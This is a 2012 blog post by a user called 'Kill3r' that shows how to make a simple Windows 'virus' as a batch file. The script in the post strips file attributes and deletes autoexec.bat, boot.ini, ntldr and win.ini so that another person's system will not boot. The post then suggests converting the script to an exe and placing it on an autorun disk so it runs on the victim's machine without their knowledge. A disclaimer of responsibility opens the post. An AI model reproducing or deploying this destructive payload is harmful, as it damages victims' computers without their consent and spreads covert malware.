Making a simple virus to corrupt windows

Posted by Kill3r On Monday, 23 July 2012 1 comments
NOTE: I am not responsible to any harm made to anyone by this post.
I assume you know the basic about batch files before reading this post. Batch files are used to run a dos command without opening command prompt window. You can run many dos commands using a single batch file.This post will show you some batch files which can corrupt your window. You can also say that these batch files can work like a virus. So be careful and not to try in your computer.

    Autoexec.bat
    Ntldr
    Boot.ini
    Win.in
i

These files are very important and necessary for any windows operating system. So if you want to corrupt windows of a person you have to delete these four files from the computer.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save this code as winVirus.bat.

If you want to make it more harmful, make its exe using bat_to_exe converter and make an autorun disk of it. When someone use the disk autorun will execute itself and command will generated by batch file will corrupt the windows.

1 comments:

Post a Comment